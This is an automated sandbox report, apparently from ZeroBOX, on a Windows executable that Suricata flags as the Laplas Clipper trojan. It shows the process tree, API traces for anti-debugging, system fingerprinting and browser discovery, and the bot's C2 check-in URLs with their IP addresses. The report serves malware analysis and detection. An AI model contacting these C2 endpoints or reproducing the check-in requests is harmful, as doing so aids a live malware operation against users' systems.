Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	April 10, 2023, 9:37 a.m.	April 10, 2023, 9:47 a.m.

Size	899.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`16b67de79530a182c3e49ae82bb5f337`
SHA256	`db086d3a605b003097b60b57556386d8e7044578dcbe734ed1bc188d4f95ff1e`
CRC32	`BDEF5CC0`
ssdeep	`24576:c5HAZujXKrsacTGwNG8mKYQoaZx1Plx96:c5HH7Krs3Tr1DZZx9`
Yara	IsPE32 - (no description) PE_Header_Zero - PE File Signature

leafgrey.exe "C:\Users\test22\AppData\Local\Temp\leafgrey.exe"
1704
- rundll32.exe "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
  2120
- rundll32.exe "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
  2388
  - rundll32.exe C:\Windows\system32\RUNDLL32.EXE C:\ProgramData\e5c728cd.dll,Entry
    2772
  - rundll32.exe "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 24161
    2848

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
14.227.106.38	Active	Moloch
165.143.163.99	Active	Moloch
176.113.115.21	Active	Moloch
176.113.115.25	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49170 -> 176.113.115.25:80	2039776	ET MALWARE Laplas Clipper - SetOnline CnC Checkin	A Network Trojan was detected
TCP 192.168.56.103:49199 -> 176.113.115.25:80	2039776	ET MALWARE Laplas Clipper - SetOnline CnC Checkin	A Network Trojan was detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49162 176.113.115.21:443	CN=Fii Lvjfoqbbjhe/OU=Tjhv/ST=fkm/O=Kvhys/C=PP/L=Lt Jssugiiwmpduhq	CN=Fii Lvjfoqbbjhe/OU=Tjhv/ST=fkm/O=Kvhys/C=PP/L=Lt Jssugiiwmpduhq	87:92:71:13:3a:02:ae:b8:97:8a:f0:72:78:06:b8:98:df:f4:58:91

Queries for the computername (19 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2023, 9:38 a.m.	computer_name:		0
GetComputerNameW April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 10, 2023, 9:38 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 10, 2023, 9:31 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (6 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 10, 2023, 9:37 a.m.			0	0
IsDebuggerPresent April 10, 2023, 9:37 a.m.			0	0
IsDebuggerPresent April 10, 2023, 9:37 a.m.			0	0
IsDebuggerPresent April 10, 2023, 9:38 a.m.			0	0
IsDebuggerPresent April 10, 2023, 9:38 a.m.			0	0
IsDebuggerPresent April 10, 2023, 9:31 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 97 events)

Time & API	Arguments	Status	Return
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f1db0 algorithm_identifier: 0x00000001 () flags: 67108865 key: provider_handle: 0x0060b0a0	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 7	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: ¤RSA2]^*_lkDóåK$²0eÈÕ0ÁýF"F8Rð4«¼ÎbþÀê-4v-ÌÀ¡æ\\|MêìÐQýOÌ¥Uøð,wðñF;G áñðèCû´ørõC3ÿWÈÅÁúJÉÍSþ¼I &ªÑìÄì¡\vDHæÆÇ0Rµg®%®ä%½ù½ãÐRßðº®ö¹Û7uá~eø _ÕGÇêoÈ´êê7áVÒÍËôó~ íZ»ýÄ:\PaÝª£û;Ý7´Óy8 ÷èôdÜ!¡'ÌæºõbDô}~¦mäöÁÏñO1!Íû]&ÖÔzµU rG\|[ Ó!°ÁP6;>of÷Z7DqØkfÜåWµØÎ«o)©[ [§BRðô[Ü.¹-$"$ççP)¿ØÝBb:N1ºÝq57¹« p +ÇrhÂ,«Ó#áè"ê~ÌE+Õ~nø{åÚûjÛ¸,»NÆmÁw-ÂÍlr±Õ%Ì<¸ÎÄLmQh`¡C9A,CÓf~þÌÕn9?¾1ÿiÔ¬áµD_ «kT9Ì¶ðù!jK[J±@Î FLÙ&-Ör$´?$ ;ÖW)±õâs _v Ê?<,v¨Té9fÿâ·ÆÕLÚîgå\|o°×pÔÚG{`ßQ©ð1¬¢ crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 7	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: ¤RSA1]^*_lkDóåK$²0eÈÕ0ÁýF"F8Rð4«¼ÎbþÀê-4v-ÌÀ¡æ\\|MêìÐQýOÌ¥Uøð,wðñF;G áñðèCû´ørõC3ÿWÈÅÁúJÉÍSþ¼I &ª crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f1d30 algorithm_identifier: 0x00006610 () flags: 1 key: f ;¾v£c ,&ndÍ¨üÌh½AÇE×9¡äÂ provider_handle: 0x0060b128	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: f ;¾v£c ,&ndÍ¨üÌh½AÇE×9¡äÂ crypto_handle: 0x005f1d30 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f1cf0 algorithm_identifier: 0x00006610 () flags: 1 key: f #ë, VÛÿ:Jæ)K¡£©Åöeöu}× pà¢{ provider_handle: 0x0060b128	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: f #ë, VÛÿ:Jæ)K¡£©Åöeöu}× pà¢{ crypto_handle: 0x005f1cf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f1db0 algorithm_identifier: 0x00006610 () flags: 1 key: f +É0fäüÚ*ú$<ýCÑäo=¡QUÐ¢dÂ provider_handle: 0x0060b128	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: f +É0fäüÚ*ú$<ýCÑäo=¡QUÐ¢dÂ crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f1db0 algorithm_identifier: 0x00006610 () flags: 1 key: f ·k÷vÝ#Fÿ6*#8öîÁLm ì«}w4 provider_handle: 0x0060b128	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: f ·k÷vÝ#Fÿ6*#8öîÁLm ì«}w4 crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f1db0 algorithm_identifier: 0x00006610 () flags: 1 key: f íÈáaBÄàPÇ°Õ¾/$Õ¸y<ÊÖàv/ùX¼³ provider_handle: 0x0060b128	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: f íÈáaBÄàPÇ°Õ¾/$Õ¸y<ÊÖàv/ùX¼³ crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f1db0 algorithm_identifier: 0x00006610 () flags: 1 key: f QEp85ÔyNÜöÛ}>Ã4Töã±wcjÔ¡G² provider_handle: 0x0060b128	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: f QEp85ÔyNÜöÛ}>Ã4Töã±wcjÔ¡G² crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f1db0 algorithm_identifier: 0x00006610 () flags: 1 key: f 7e6põù:¯V°0wø9ç*ÚÕ;³;á provider_handle: 0x0060b128	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: f 7e6põù:¯V°0wø9ç*ÚÕ;³;á crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f1db0 algorithm_identifier: 0x00006610 () flags: 1 key: f ¦Ñ«¯ØªÞXv M(9LæÒe[dn MòÐ provider_handle: 0x0060b128	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: f ¦Ñ«¯ØªÞXv M(9LæÒe[dn MòÐ crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f1db0 algorithm_identifier: 0x00006610 () flags: 1 key: f ;À{¸¥£ëL}Mã<4RLV\|ÊØúëÑKÂ provider_handle: 0x0060b128	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: f ;À{¸¥£ëL}Mã<4RLV\|ÊØúëÑKÂ crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f1db0 algorithm_identifier: 0x00006610 () flags: 1 key: f ¹xeÍC×£î½ãçSBy)ÞÚé¹VÁf provider_handle: 0x0060b128	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: f ¹xeÍC×£î½ãçSBy)ÞÚé¹VÁf crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f1db0 algorithm_identifier: 0x00006610 () flags: 1 key: f qWóÆüÔ~Løi¢ÄæÊ:è2?Ïa+Qª:èOü provider_handle: 0x0060b128	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: f qWóÆüÔ~Løi¢ÄæÊ:è2?Ïa+Qª:èOü crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f1db0 algorithm_identifier: 0x00006610 () flags: 1 key: f tÐ§yöó êôÝäNÐö¤M Ï®à:5aj±ÁÅ provider_handle: 0x0060b128	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: f tÐ§yöó êôÝäNÐö¤M Ï®à:5aj±ÁÅ crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f1db0 algorithm_identifier: 0x00006610 () flags: 1 key: f JyELð¬_9ÓâóÙÊzPy@&eç]¨#DHð provider_handle: 0x0060b128	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: f JyELð¬_9ÓâóÙÊzPy@&eç]¨#DHð crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f1db0 algorithm_identifier: 0x00006610 () flags: 1 key: f FÂyh{}foùClÝKÂ i¡ö'á·¦Â7 provider_handle: 0x0060b128	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: f FÂyh{}foùClÝKÂ i¡ö'á·¦Â7 crypto_handle: 0x005f1db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptGenKey April 10, 2023, 9:38 a.m.	crypto_handle: 0x005f2070 algorithm_identifier: 0x00006610 () flags: 1 key: f YõÐ;Alª©0¿ºë[z¤J=ÖÊÈ¯ãönóÅ)QP² provider_handle: 0x0060b1b0	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f2070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey April 10, 2023, 9:38 a.m.	buffer: f YõÐ;Alª©0¿ºë[z¤J=ÖÊÈ¯ãönóÅ)QP² crypto_handle: 0x005f2070 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (4 events)

registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\MachineGuid
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\DigitalProductId
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\DigitalProductId
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\InstallDate

Tries to locate where the browsers are installed (5 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\NoModify
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\Path
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 10, 2023, 9:38 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Starts servers listening (25 events)

Time & API	Arguments	Status	Return
bind April 10, 2023, 9:38 a.m.	ip_address: 127.0.0.1 socket: 596 port: 24158	1	0
listen April 10, 2023, 9:38 a.m.	socket: 596 backlog: 0	1	0
bind April 10, 2023, 9:38 a.m.	ip_address: 127.0.0.1 socket: 1076 port: 24159	1	0
listen April 10, 2023, 9:38 a.m.	socket: 1076 backlog: 5	1	0
accept April 10, 2023, 9:38 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49175	1	1332
accept April 10, 2023, 9:38 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49184	1	2164
accept April 10, 2023, 9:38 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49189	1	2332
accept April 10, 2023, 9:38 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49190	1	2320
accept April 10, 2023, 9:38 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49192	1	2328
accept April 10, 2023, 9:38 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49193	1	2316
accept April 10, 2023, 9:39 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49194	1	828
accept April 10, 2023, 9:39 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49195	1	844
accept April 10, 2023, 9:39 a.m.	ip_address: 127.0.0.1 socket: 1076 port: 49196	1	848
accept April 10, 2023, 9:39 a.m.	ip_address: 127.0.0.1 socket: 1076 port: 49198	1	856
accept April 10, 2023, 9:39 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49200	1	2296
accept April 10, 2023, 9:39 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49201	1	2316
accept April 10, 2023, 9:39 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49202	1	2336
accept April 10, 2023, 9:39 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49203	1	2316
accept April 10, 2023, 9:39 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49204	1	512
accept April 10, 2023, 9:39 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49205	1	512
accept April 10, 2023, 9:39 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49206	1	492
accept April 10, 2023, 9:39 a.m.	ip_address: 127.0.0.1 socket: 596 port: 49207	1	444
bind April 10, 2023, 9:31 a.m.	ip_address: 127.0.0.1 socket: 244 port: 24161	1	0
listen April 10, 2023, 9:31 a.m.	socket: 244 backlog: 0	1	0
accept April 10, 2023, 9:31 a.m.	ip_address: 127.0.0.1 socket: 244 port: 49172	1	320

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.25/bot/regex
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://176.113.115.25/bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET https://176.113.115.21/V/sdkk5ywn1w/+iBH32vcXr87CL+YROcC3SO1z8sYve4b76amRKql5QDggj0I2AbinPxGpJbUpQllBVERtRx9KxUVyC8nK1a/109MZIB7ehXnhRA3u3fF/IMK5Pu2eHFKgJD6GNFhhJ8ea3akdd9FiO9eshpO8O7kUDRwSFsJBldB2jRI6xHsPmDHX7HIWLDBV7oSpPsNqfwQg==

Performs some HTTP requests (3 events)

request	GET http://176.113.115.25/bot/regex
request	GET http://176.113.115.25/bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de
request	GET https://176.113.115.21/V/sdkk5ywn1w/+iBH32vcXr87CL+YROcC3SO1z8sYve4b76amRKql5QDggj0I2AbinPxGpJbUpQllBVERtRx9KxUVyC8nK1a/109MZIB7ehXnhRA3u3fF/IMK5Pu2eHFKgJD6GNFhhJ8ea3akdd9FiO9eshpO8O7kUDRwSFsJBldB2jRI6xHsPmDHX7HIWLDBV7oSpPsNqfwQg==

Allocates read-write-execute memory (usually to unpack itself) (50 out of 106 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 10, 2023, 9:37 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:37 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778bf000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2023, 9:37 a.m.	process_identifier: 1704 region_size: 11837440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05850000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:37 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778bf000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2023, 9:37 a.m.	process_identifier: 1704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04420000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:37 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778bf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06318000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04600000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x757f7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04600000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0644e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x064c4000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04610000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x755f7000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04610000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0644e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x064c4000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06560000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75639000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06560000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0644e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x064c4000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06b10000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x746c2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06b10000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0644e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 1704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x064c4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:37 a.m.	process_identifier: 2120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75600000 process_handle: 0xffffffff	1
